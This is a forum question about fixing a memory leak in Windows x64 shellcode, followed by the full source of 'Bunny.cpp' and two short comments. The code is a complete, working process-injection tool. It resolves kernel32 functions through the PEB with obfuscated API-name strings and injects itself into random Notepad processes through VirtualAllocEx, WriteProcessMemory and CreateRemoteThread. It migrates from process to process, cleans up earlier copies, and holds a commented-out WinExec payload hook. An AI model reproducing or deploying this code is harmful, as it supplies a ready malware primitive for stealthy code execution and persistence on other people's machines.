# How to prevent a memory leak when injecting shellcode into another process?

Tags: c, windows, multithreading, shellcode

I've written this simple Windows C shellcode to create a remote thread in a Notepad process. The new thread will wait for 3 seconds, and then it will randomly select another Notepad process to jump to.

For example, the remote thread started by this shellcode will appear highlighted in green as `RtlUserThreadStart` and in red when it exits.

[image: bunny-jumps]

The concern is when exiting the current thread, there's a 4K memory leak since VirtualFreeEx() is skipped.

```
// Create a remote thread in Notepad.exe
shellcodeAddr = ((FARPROC(WINAPI*)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD))(VirtualAllocEx))(hProcess, NULL, sizeofshellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
...
// Exit the current thread...Possible slow memory leak since VirtualFreeEx() is skipped?
((FARPROC(WINAPI*)(DWORD))(ExitThread))(0);
```

**Question**

Is there a way to prevent memory leakage when the remote thread jumps between Notepad processes?

**Bunny.cpp**

```
// Windows x86-64 - Shellcode to create a remote thread which randomly jumps between a group of Notepad processes.

// Microsoft Visual C++ 2019
// Configuration: Debug x64
// 
// Compiler Command:   /permissive- /ifcOutput "x64\Debug\" /GS- /W3 /Zc:wchar_t /ZI /Gm- /Od /sdl- /Fd"x64\Debug\vc142.pdb" /Zc:inline /fp:precise /D "_DEBUG" /D "_CONSOLE" /errorReport:prompt /WX- /Zc:forScope /Gz /MT /FC /Fa"x64\Debug\" /nologo /Fo"x64\Debug\" /Fp"x64\Debug\Bunny.pch" /diagnostics:column
// Additional Options: /Gs8192
// 
// Linker Command:     /OUT:"C:\Bunny\x64\Debug\Bunny.exe" /MANIFEST /NXCOMPAT /PDB:"C:\Bunny\x64\Debug\Bunny.pdb" /DYNAMICBASE "kernel32.lib" "user32.lib" "gdi32.lib" "winspool.lib" "comdlg32.lib" "advapi32.lib" "shell32.lib" "ole32.lib" "oleaut32.lib" "uuid.lib" "odbc32.lib" "odbccp32.lib" /DEBUG /MACHINE:X64 /INCREMENTAL /PGD:"C:\Bunny\x64\Debug\Bunny.pgd" /SUBSYSTEM:CONSOLE /MANIFESTUAC:"level='asInvoker' uiAccess='false'" /ManifestFile:"x64\Debug\Bunny.exe.intermediate.manifest" /LTCGOUT:"x64\Debug\Bunny.iobj" /ORDER:@"Bunny.cpp" /ERRORREPORT:PROMPT /ILK:"x64\Debug\Bunny.ilk" /NOLOGO /TLBID:1 

#include <Windows.h>
#include <Winternl.h>
#include <stdio.h>
#include <stdint.h>
#include <intrin.h>
#include <tchar.h>
#include <psapi.h>
#include <tlhelp32.h>
#include <winDNS.h>  // Needed to define a QWORD
   
#define MAX_NOTEPADS 4


// Computed offsets to locals within shellcode_start()
// ------------------------------------------------------------
#define START_SHELLCODE_OFFSET          17
#define SIZEOFSHELLCODE_OFFSET          32
#define START_SHELLCODE_INJECTOR_OFFSET 38
#define PID_INJECTOR_OFFSET             53
// ------------------------------------------------------------


DWORD WINAPI shellcode_start(void)
{
    // ------------------------------------------------------------
    QWORD          start_shellcode          = 0xDEADBEEFBAADF00D;
    DWORD          sizeofshellcode          = 0;
    QWORD          start_shellcode_injector = 0xFEEDFACECAFEBEEF;
    DWORD          pid_injector             = 0;
    // ------------------------------------------------------------

    HANDLE         hProcess_injector;
    HANDLE         hThread;
    HANDLE         hProcess;
    HANDLE         hSnapshot;
    PROCESSENTRY32 pe32;
    DWORD          pid_array[MAX_NOTEPADS] = { 0 };
    DWORD          random_pid;
    DWORD          cPIDs = 0;
    DWORD          currentPID;
    LPVOID         shellcodeAddr;

    char calc[] = { 'c','a','l','c','.','e','x','e',0 };
    char winexec[] = { 'W','i','n','E','x','e','c',0 };
    char sleep[] = { 'S','l','e','e','p',0 };
    char createtoolhelp32snapshot[] = { 'C','r','e','a','t','e','T','o','o','l','h','e','l','p','3','2','S','n','a','p','s','h','o','t',0 };
    char process32first[] = { 'P','r','o','c','e','s','s','3','2','F','i','r','s','t',0 };
    char process32next[] = { 'P','r','o','c','e','s','s','3','2','N','e','x','t',0 };
    char closehandle[] = { 'C','l','o','s','e','H','a','n','d','l','e',0 };
    char openprocess[] = { 'O','p','e','n','P','r','o','c','e','s','s',0 };
    char virtualallocex[] = { 'V','i','r','t','u','a','l','A','l','l','o','c','E','x',0 };
    char virtualfreeex[] = { 'V','i','r','t','u','a','l','F','r','e','e','E','x',0 };
    char writeprocessmemory[] = { 'W','r','i','t','e','P','r','o','c','e','s','s','M','e','m','o','r','y',0 };
    char createremotethread[] = { 'C','r','e','a','t','e','R','e','m','o','t','e','T','h','r','e','a','d',0 };
    char comparestringa[] = { 'C','o','m','p','a','r','e','S','t','r','i','n','g','A',0 };
    char notepad[] = { 'n','o','t','e','p','a','d','.','e','x','e',0 };
    char getcurrentprocessid[] = { 'G','e','t','C','u','r','r','e','n','t','P','r','o','c','e','s','s','I','d',0 };
    char exitthread[] = { 'E','x','i','t','T','h','r','e','a','d',0 };
    char getprocaddress[] = { 'G','e','t','P','r','o','c','A','d','d','r','e','s','s',0 };
    wchar_t kernel32dll[] = { 'K','E','R','N','E','L','3','2','.','D','L','L',0 };

    // Using the PEB technique just in case the kernel32 base address is different for each process.
    // Get a pointer to the current process's PEB (Process Environment Block)
    _PEB* peb = (_PEB*)__readgsqword(0x60);

    // Get a pointer to the list of loaded modules in the current process
    PLIST_ENTRY moduleList = &peb->Ldr->InMemoryOrderModuleList;

    // Iterate through the list of loaded modules looking for KERNEL32.DLL ...
    for (PLIST_ENTRY currentModule = moduleList->Flink; currentModule != moduleList; currentModule = currentModule->Flink)
    {
        if (*(QWORD*)(((LDR_DATA_TABLE_ENTRY*)currentModule)->FullDllName.Buffer) == *(QWORD*)(kernel32dll))
        {
            PLDR_DATA_TABLE_ENTRY pLdrEntry = CONTAINING_RECORD(currentModule, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
            HMODULE kernel32 = (HMODULE)pLdrEntry->DllBase;
            PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)kernel32;
            PIMAGE_NT_HEADERS64 pNtHeaders = (PIMAGE_NT_HEADERS64)((BYTE*)pDosHeader + pDosHeader->e_lfanew);
            PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)kernel32 + pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
            DWORD* pAddressOfFunctions = (DWORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfFunctions);
            DWORD* pAddressOfNames = (DWORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfNames);
            WORD* pAddressOfNameOrdinals = (WORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfNameOrdinals);

            // Iterate through the list of KERNEL32.DLL names looking for GetProcAddress ...
            for (DWORD i = 0; i < pExportDirectory->NumberOfNames; i++)
            {
                if (*(QWORD*)((BYTE*)kernel32 + pAddressOfNames[i]) == *(QWORD*)getprocaddress)
                {
                    FARPROC GetProcAddress = (FARPROC)((BYTE*)kernel32 + pAddressOfFunctions[pAddressOfNameOrdinals[i]]);

                    FARPROC WinExec = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(GetProcAddress))(kernel32, winexec);
                    FARPROC Sleep = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(GetProcAddress))(kernel32, sleep);
                    FARPROC CreateToolhelp32Snapshot = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(GetProcAddress))(kernel32, createtoolhelp32snapshot);
                    FARPROC Process32First = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(GetProcAddress))(kernel32, process32first);
                    FARPROC Process32Next = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(GetProcAddress))(kernel32, process32next);
                    FARPROC CloseHandle = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(GetProcAddress))(kernel32, closehandle);
                    FARPROC OpenProcess = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(GetProcAddress))(kernel32, openprocess);
                    FARPROC VirtualAllocEx = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(GetProcAddress))(kernel32, virtualallocex);
                    FARPROC VirtualFreeEx = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(GetProcAddress))(kernel32, virtualfreeex);
                    FARPROC WriteProcessMemory = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(GetProcAddress))(kernel32, writeprocessmemory);
                    FARPROC CreateRemoteThread = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(GetProcAddress))(kernel32, createremotethread);
                    FARPROC CompareStringA = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(GetProcAddress))(kernel32, comparestringa);
                    FARPROC GetCurrentProcessId = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(GetProcAddress))(kernel32, getcurrentprocessid);
                    FARPROC ExitThread = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(GetProcAddress))(kernel32, exitthread);

                    /*******************************
                    *                              *
                    *     Do stuff here Zzz...     *
                    *                              *
                    ********************************/
                    ((FARPROC(WINAPI*)(UINT))(Sleep))(3 * 1000);
                    //((FARPROC(WINAPI*)(LPCSTR, UINT))(WinExec))(calc, SW_SHOW);

                    // Cleanup injector memory!
                    hProcess_injector = (HANDLE)((FARPROC(WINAPI*)(DWORD, BOOL, DWORD))(OpenProcess))(PROCESS_ALL_ACCESS, FALSE, pid_injector);
                    ((FARPROC(WINAPI*)(HANDLE, LPVOID, SIZE_T, DWORD))(VirtualFreeEx))(hProcess_injector, (LPVOID)start_shellcode_injector, 0, MEM_RELEASE);
                    ((FARPROC(WINAPI*)(HANDLE))(CloseHandle))(hProcess_injector);

                    // Take a snapshot of all Notepad processes ...
                    currentPID = (DWORD)((FARPROC(WINAPI*)())(GetCurrentProcessId))();
                    hSnapshot = ((FARPROC(WINAPI*)(DWORD, DWORD))(CreateToolhelp32Snapshot))(TH32CS_SNAPPROCESS, 0);
                    pe32.dwSize = sizeof(PROCESSENTRY32);
                    if (((FARPROC(WINAPI*)(HANDLE, LPPROCESSENTRY32))(Process32First))(hSnapshot, &pe32))
                    {
                        do
                        {
                            if (cPIDs < MAX_NOTEPADS)
                            {
                                // Prevent self-injecting shellcode into current Notepad process
                                if (currentPID != pe32.th32ProcessID)
                                {
                                    if ((int)((FARPROC(WINAPI*)(LCID, DWORD, PCNZCH, INT, PCNZCH, INT))(CompareStringA))(LOCALE_USER_DEFAULT, NORM_IGNORECASE, pe32.szExeFile, -1, notepad, -1) == CSTR_EQUAL)
                                    {
                                        pid_array[cPIDs++] = pe32.th32ProcessID;
                                    }
                                }
                            }
                        } while (((FARPROC(WINAPI*)(HANDLE, LPPROCESSENTRY32))(Process32Next))(hSnapshot, &pe32));
                    }
                    ((FARPROC(WINAPI*)(HANDLE))(CloseHandle))(hSnapshot);

                    // Open a random Notepad process
                    random_pid = pid_array[__rdtsc() % cPIDs];
                    hProcess = ((FARPROC(WINAPI*)(DWORD, BOOL, DWORD))(OpenProcess))(PROCESS_ALL_ACCESS, FALSE, random_pid);

                    // Create a remote thread in Notepad
                    shellcodeAddr = ((FARPROC(WINAPI*)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD))(VirtualAllocEx))(hProcess, NULL, sizeofshellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
                    ((FARPROC(WINAPI*)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T))(WriteProcessMemory))(hProcess, shellcodeAddr, (BYTE*)start_shellcode, sizeofshellcode, NULL);
                    ((FARPROC(WINAPI*)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T))(WriteProcessMemory))(hProcess, (BYTE*)shellcodeAddr + START_SHELLCODE_OFFSET, &shellcodeAddr, sizeof(shellcodeAddr), NULL);
                    ((FARPROC(WINAPI*)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T))(WriteProcessMemory))(hProcess, (BYTE*)shellcodeAddr + START_SHELLCODE_INJECTOR_OFFSET, &start_shellcode, sizeof(start_shellcode), NULL);
                    ((FARPROC(WINAPI*)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T))(WriteProcessMemory))(hProcess, (BYTE*)shellcodeAddr + PID_INJECTOR_OFFSET, &currentPID, sizeof(currentPID), NULL);
                    hThread = ((FARPROC(WINAPI*)(HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD))(CreateRemoteThread))(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)shellcodeAddr, NULL, 0, NULL);

                    // Cleanup
                    ((FARPROC(WINAPI*)(HANDLE))(CloseHandle))(hThread);
                    ((FARPROC(WINAPI*)(HANDLE))(CloseHandle))(hProcess);

                    if (start_shellcode_injector != 0xFEEDFACECAFEBEEF)
                    {
                        // Exit current remote thread ...
                        ((FARPROC(WINAPI*)(DWORD))(ExitThread))(0);
                    }

                    // Exit initial injector thread ...
                    break;
                }
            }
            break;
        }
    }

    // Unique marker to indicate end of shellcode.
    __nop();
    __nop();

    return 0;
}


void LaunchNotepads(void)
{
    for (int i = 0; i < MAX_NOTEPADS; ++i)
    {
        STARTUPINFO si;
        PROCESS_INFORMATION pi;

        ZeroMemory(&si, sizeof(si));
        si.cb = sizeof(si);
        ZeroMemory(&pi, sizeof(pi));

        CreateProcessA("C:\\Windows\\System32\\Notepad.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);

        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
}


DWORD GetShellcodeSize(void)
{
    BYTE NOP = 0x90;

    // Scan for end of shellcode marker NOP NOP
    BYTE* shellcode_end = (BYTE*)shellcode_start;
    while (1) {
        if (*shellcode_end == NOP && *(shellcode_end + 1) == NOP) {
            /*
                ...
                90                   nop                   ; NOP marker
                90                   nop                   ; NOP marker
                33 C0                xor eax, eax          ; Return value
                48 8D A5 48 04 00 00 lea rsp, [rbp + 448h] ; |
                5F                   pop rdi               ; | Epilogue
                5D                   pop rbp               ; |
                C3                   ret                   ; Return
                ...
            */
            shellcode_end += 14;
            break;
        }
        shellcode_end++;
    }

    return (DWORD)(shellcode_end - (BYTE*)shellcode_start);
}


void RunShellcode(void)
{
    DWORD sizeofshellcode = GetShellcodeSize();

    // Copy the shellcode to the allocated memory and execute it...
    LPVOID shellcode_mem = VirtualAlloc(NULL, sizeofshellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (shellcode_mem == NULL)
    {
        printf("Error allocating memory. Error code: %d\n", GetLastError());
        exit(1);
    }

    memcpy(shellcode_mem, shellcode_start, sizeofshellcode);

    // Update the injectee shellcode address and size 
    *((QWORD*)((BYTE*)shellcode_mem + START_SHELLCODE_OFFSET)) = (QWORD)shellcode_mem;
    *((DWORD*)((BYTE*)shellcode_mem + SIZEOFSHELLCODE_OFFSET)) = sizeofshellcode;

    void (*jump_to_shellcode)() = (void (*)())shellcode_mem;
    jump_to_shellcode();

    VirtualFree(shellcode_mem, 0, MEM_RELEASE);
}


int main(int argc, char* argv[])
{
    printf("[+] Launching %d Notepad Processes\n", MAX_NOTEPADS);
    LaunchNotepads();

    printf("[+] Injecting Shellcode\n");
    RunShellcode();

    printf("[+] Done. Press Any Key To Exit...\n");
    (void)getchar();

    return 0;
}
```

**Update**

Fixed the memory leak by having the injector pass these values `current PID` and `shellcode memory address` to the injectee. In the injectee, it fetches those values and frees the injector shellcode memory by calling OpenProcess() and VirtualFreeEx()! (see Bunny.cpp)

Comment: @vengy - your question is unclear. Is there a way to prevent memory leakage - of course exist and so what ? this is only question of implementation.

Comment: Unless you are intentionally trying to be evil, [FreeLibraryAndExitThread](https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-freelibraryandexitthread) is the supported way to handle this.